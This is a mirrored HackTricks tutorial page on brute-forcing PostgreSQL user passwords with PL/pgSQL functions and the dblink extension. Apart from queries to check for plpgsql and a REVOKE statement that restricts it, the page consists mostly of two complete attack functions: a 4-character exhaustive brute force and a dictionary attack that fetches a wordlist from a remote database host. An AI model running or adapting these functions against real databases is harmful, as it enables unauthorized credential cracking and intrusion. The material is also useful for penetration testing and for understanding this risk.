mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-20 10:03:51 +00:00
148 lines
6.6 KiB
Markdown
148 lines
6.6 KiB
Markdown
|
# PL/pgSQL Password Bruteforce
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
**Find [more information about these attack in the original paper](http://www.leidecker.info/pgshell/Having\_Fun\_With\_PostgreSQL.txt)**.
|
||
|
|
||
|
PL/pgSQL is a **fully featured programming language** that extends beyond the capabilities of SQL by offering **enhanced procedural control**. This includes the utilization of loops and various control structures. Functions crafted in the PL/pgSQL language can be invoked by SQL statements and triggers, broadening the scope of operations within the database environment.
|
||
|
|
||
|
You can abuse this language in order to ask PostgreSQL to brute-force the users credentials, but it must exist on the database. You can verify it's existence using:
|
||
|
|
||
|
```sql
|
||
|
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
|
||
|
lanname | lanacl
|
||
|
---------+---------
|
||
|
plpgsql |
|
||
|
```
|
||
|
|
||
|
By default, **creating functions is a privilege granted to PUBLIC**, where PUBLIC refers to every user on that database system. To prevent this, the administrator could have had to revoke the USAGE privilege from the PUBLIC domain:
|
||
|
|
||
|
```sql
|
||
|
REVOKE ALL PRIVILEGES ON LANGUAGE plpgsql FROM PUBLIC;
|
||
|
```
|
||
|
|
||
|
In that case, our previous query would output different results:
|
||
|
|
||
|
```sql
|
||
|
SELECT lanname,lanacl FROM pg_language WHERE lanname = 'plpgsql';
|
||
|
lanname | lanacl
|
||
|
---------+-----------------
|
||
|
plpgsql | {admin=U/admin}
|
||
|
```
|
||
|
|
||
|
Note that for the following script to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with 
|
||
|
|
||
|
```sql
|
||
|
CREATE EXTENSION dblink;
|
||
|
```
|
||
|
|
||
|
## Password Brute Force
|
||
|
|
||
|
Here how you could perform a 4 chars password bruteforce:
|
||
|
|
||
|
```sql
|
||
|
//Create the brute-force function
|
||
|
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
|
||
|
username TEXT, dbname TEXT) RETURNS TEXT AS
|
||
|
$$
|
||
|
DECLARE
|
||
|
word TEXT;
|
||
|
BEGIN
|
||
|
FOR a IN 65..122 LOOP
|
||
|
FOR b IN 65..122 LOOP
|
||
|
FOR c IN 65..122 LOOP
|
||
|
FOR d IN 65..122 LOOP
|
||
|
BEGIN
|
||
|
word := chr(a) || chr(b) || chr(c) || chr(d);
|
||
|
PERFORM(SELECT * FROM dblink(' host=' || host ||
|
||
|
' port=' || port ||
|
||
|
' dbname=' || dbname ||
|
||
|
' user=' || username ||
|
||
|
' password=' || word,
|
||
|
'SELECT 1')
|
||
|
RETURNS (i INT));
|
||
|
RETURN word;
|
||
|
EXCEPTION
|
||
|
WHEN sqlclient_unable_to_establish_sqlconnection
|
||
|
THEN
|
||
|
-- do nothing
|
||
|
END;
|
||
|
END LOOP;
|
||
|
END LOOP;
|
||
|
END LOOP;
|
||
|
END LOOP;
|
||
|
RETURN NULL;
|
||
|
END;
|
||
|
$$ LANGUAGE 'plpgsql';
|
||
|
|
||
|
//Call the function
|
||
|
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
|
||
|
```
|
||
|
|
||
|
_Note that even brute-forcing 4 characters may take several minutes._
|
||
|
|
||
|
You could also **download a wordlist** and try only those passwords (dictionary attack):
|
||
|
|
||
|
```sql
|
||
|
//Create the function
|
||
|
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT,
|
||
|
username TEXT, dbname TEXT) RETURNS TEXT AS
|
||
|
$$
|
||
|
BEGIN
|
||
|
FOR word IN (SELECT word FROM dblink('host=1.2.3.4
|
||
|
user=name
|
||
|
password=qwerty
|
||
|
dbname=wordlists',
|
||
|
'SELECT word FROM wordlist')
|
||
|
RETURNS (word TEXT)) LOOP
|
||
|
BEGIN
|
||
|
PERFORM(SELECT * FROM dblink(' host=' || host ||
|
||
|
' port=' || port ||
|
||
|
' dbname=' || dbname ||
|
||
|
' user=' || username ||
|
||
|
' password=' || word,
|
||
|
'SELECT 1')
|
||
|
RETURNS (i INT));
|
||
|
RETURN word;
|
||
|
|
||
|
EXCEPTION
|
||
|
WHEN sqlclient_unable_to_establish_sqlconnection THEN
|
||
|
-- do nothing
|
||
|
END;
|
||
|
END LOOP;
|
||
|
RETURN NULL;
|
||
|
END;
|
||
|
$$ LANGUAGE 'plpgsql'
|
||
|
|
||
|
-- Call the function
|
||
|
select brute_force('127.0.0.1', '5432', 'postgres', 'postgres');
|
||
|
```
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|